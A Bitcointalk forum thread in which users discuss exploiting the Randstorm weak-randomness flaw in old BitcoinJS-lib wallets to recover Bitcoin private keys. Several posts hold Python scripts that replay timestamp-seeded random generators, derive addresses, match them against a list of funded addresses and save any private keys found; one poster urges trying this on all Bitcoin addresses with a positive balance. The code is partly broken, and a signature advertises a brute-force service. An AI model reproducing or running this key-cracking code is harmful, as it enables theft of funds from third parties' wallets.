Author

Topic: Randstorm-for-puzzle (Read 301 times)

member
Activity: 499
Merit: 38
May 31, 2024, 07:00:25 AM
#9
Do you already have its implementation?

if you really want to use speific js - you can load the whole thing into python... Grin

Code:
import sys
import os
from datetime import datetime, timedelta
import time
import subprocess

if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
t = time.ctime()
sys.stdout.write(f"\033[?25l")
sys.stdout.write(f"\033[01;33m[+] {t}\n")
sys.stdout.flush()

# JavaScript code to execute
js_code = """
// Paste your SecureRandom1.js code here
"""

def execute_js(js_code):
    # Execute JavaScript code using Node.js subprocess
    result = subprocess.run(['node', '-e', js_code], capture_output=True, text=True)
    return result.stdout.strip()

# Specify the start and end date and times
start_datetime = datetime(2011, 1, 1, 0, 0, 0)
end_datetime = datetime(2015, 1, 15, 19, 7, 14)

current_datetime = start_datetime

while current_datetime <= end_datetime:
    # Format the current datetime to exclude fractional seconds
    timestamp = current_datetime.strftime('%Y-%m-%d %H:%M:%S')

    # Execute JavaScript code to generate private keys
    private_key_hex3 = execute_js(js_code + "\n" + "console.log('SecureRandom3:', privateKeyHex3)")

    # Execute JavaScript code to generate private keys
    private_key_hex2 = execute_js(js_code + "\n" + "console.log('SecureRandom2:', privateKeyHex2)")

    print('Timestamp:', timestamp)
    print('SecureRandom3:', private_key_hex3)
    print('SecureRandom2:', private_key_hex2)

    current_datetime += timedelta(seconds=1)

You need to change SEED_TIME_VALUE to use the current timestamp every loop, you need to modify the JavaScript code in SecureRandom1.js to use the current timestamp instead of a fixed value.
member
Activity: 499
Merit: 38
May 31, 2024, 03:30:33 AM
#8
Code:
import random, sys, os
from datetime import datetime, timedelta
import time
import secp256k1 as ice

if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
t = time.ctime()
sys.stdout.write(f"\033[?25l")
sys.stdout.write(f"\033[01;33m[+] {t}\n")
sys.stdout.flush()

class SecureRandom:
    def __init__(self, seed):
        self.rng_state = None
        self.rng_pool = []
        self.rng_pptr = 0
        self.rng_psize = 32
        random.seed(seed)
        for _ in range(self.rng_psize):
            self.rng_pool.append(random.randint(0, 255))
        self.rng_pptr = 0

    def rng_get_byte(self):
        if self.rng_pptr >= len(self.rng_pool):
            self.rng_pptr = 0
            self.rng_pool = [random.randint(0, 255) for _ in range(self.rng_psize)]
        byte = self.rng_pool[self.rng_pptr]
        self.rng_pptr += 1
        return byte

    def rng_get_bytes(self, length):
        result = bytearray(length)
        for i in range(length):
            result[i] = self.rng_get_byte()
        return result

def custom_private_key_generator(rng_simulator=None):
    # If no random number generator simulator is provided, create a new one
    rng = SecureRandom()
    private_key_bytes = rng.rng_get_bytes(32)
    private_key_hex = private_key_bytes.hex()
    return private_key_hex

def generate_address(private_key):
    dec = int(private_key, 16)
    caddr = ice.privatekey_to_address(0, True, dec)
    uaddr = ice.privatekey_to_address(0, False, dec)
    return caddr, uaddr

richFile = "richFile.txt"

rl = [iu.strip() for iu in open(richFile).readlines()]
richList = set(rl)

# Specify the start and end date and times
start_datetime = datetime(2013, 11, 1, 0, 0, 0)
end_datetime = datetime(2015, 1, 15, 19, 7, 14)

# Calculate the time range in seconds
time_range_seconds = (end_datetime - start_datetime).total_seconds()

current_datetime = start_datetime

while current_datetime <= end_datetime:
    # Format the current datetime to exclude fractional seconds
    timestamp = current_datetime.strftime('%Y-%m-%d %H:%M:%S')

    # Convert the formatted timestamp to a Unix timestamp
    current_seed = int(datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S').timestamp())
    # Create a secure random number generator
    secure_rng = SecureRandom(current_seed)

    random_bytes = secure_rng.rng_get_bytes(32)
    hex_representation = random_bytes.hex()
    private_key = hex_representation

    caddr, uaddr = generate_address(private_key)
    message = "\r[+] {}, {}".format(caddr, timestamp);messages = []
    messages.append(message);output = "\033[01;33m" + ''.join(messages) + "\r"
    sys.stdout.write(output);sys.stdout.flush()
    # Check if the generated address matches
    if caddr in richList or uaddr in richList:
        wifc = ice.btc_pvk_to_wif(private_key)
        wifu = ice.btc_pvk_to_wif(private_key, False)
        with open("KEYFOUNDKEYFOUND.txt", "a") as file:
            file.write("\nPrivate Key (hex): " + private_key)
            file.write("\nPrivate key (wif) Compressed : " + wifc)
            file.write("\nPrivate key (wif) Uncompressed: " + wifu)
            file.write("\nBitcoin address Compressed: " + caddr)
            file.write("\nBitcoin address Uncompressed: " + uaddr)
            file.write(
                "\n-------------------------------------------------------------------------------------------------------------------------------------------\n"
            )

    current_datetime += timedelta(seconds=1)


You can try all possible BTC addresses with this, but I had no luck.

Everything has already been hacked that had flaws.

member
Activity: 499
Merit: 38
May 31, 2024, 01:23:17 AM
#7
Anybody know any site that use BitcoinJS-lib in late 2011? Can you show examples?

I don't know about 2011 but here is one from 2013 - 2015

https://web.archive.org/web/20140210085752/https://coinpunk.com/
jr. member
Activity: 43
Merit: 1
May 31, 2024, 12:01:51 AM
#6
Anybody know any site that use BitcoinJS-lib in late 2011? Can you show examples?
member
Activity: 873
Merit: 22
$$P2P BTC BRUTE.JOIN NOW ! https://uclck.me/SQPJk
May 30, 2024, 03:03:08 PM
#5
It's very similar to what you did on github.

I don't know what I haven't tried in the last 5 years.
Thousands of scripts and experiments.
Even different random generators from here

https://github.com/schmouk/PyRandLib


Various variants for random seed. Can you imagine that i  tried UUID - uuid3() , uuid4() , uuid5()  as a random seed ?

I even physically turned back time on the PC. Grin


I was try this rng

https://github.com/lemire/fastrand


And  hi find privkey 2**32 axact ac 2**32 nymbers generated


2**10 exact at 2**10 generated numbers )))))
member
Activity: 499
Merit: 38
May 30, 2024, 02:04:36 PM
#4
It's very similar to what you did on github.

I don't know what I haven't tried in the last 5 years.
Thousands of scripts and experiments.
Even different random generators from here

https://github.com/schmouk/PyRandLib


Various variants for random seed. Can you imagine that i  tried UUID - uuid3() , uuid4() , uuid5()  as a random seed ?

I even physically turned back time on the PC. Grin
jr. member
Activity: 31
Merit: 5
May 30, 2024, 01:41:51 PM
#3
I have already tried all possible timestamps for 32 BTC Puzzle with this method from

start_datetime = datetime(2010, 1, 1, 0, 0, 0)
end_datetime = datetime(2015, 1, 15, 19, 7, 14)

unfortunately, this puzzle was not created with that tool.  Grin


But you can try all other BTC addresses that have a positive balance using the same method.

Good luck.

I am still working to implement math.random() as it was used in the older version of browsers.
Chrome and Firefox had slightly different methods.

Do you already have its implementation?
member
Activity: 499
Merit: 38
May 30, 2024, 12:17:39 PM
#2
I have already tried all possible timestamps for 32 BTC Puzzle with this method from

start_datetime = datetime(2010, 1, 1, 0, 0, 0)
end_datetime = datetime(2015, 1, 15, 19, 7, 14)

unfortunately, this puzzle was not created with that tool.  Grin


But you can try all other BTC addresses that have a positive balance using the same method.

Good luck.
jr. member
Activity: 31
Merit: 5
May 17, 2024, 11:17:19 AM
#1
Hi all,

I want to present my work in process project ie, to try using Randstorm vulnerabiility for solving the puzzle.

Link to the Git repo.

https://github.com/Stilichov/Randstorm-for-puzzle

The idea is that, between 2010 and 2015, many exchanges and websites relied on BitcoinJS-lib v0.1.3 for Bitcoin wallet generation. The issue was that many browsers didn't use window.crypto.random, which led to entropy being collected from Math.random().
The Bitcoin Challenge Transaction was created in 2015, and the wallets were created with math.random()

I am still trying to replicate the vulnerable math.random() functions used in the older versions of the browser.

While the project is still work in progress, I welcome your feedback and ideas to implement the the old math.random() functions.




Jump to: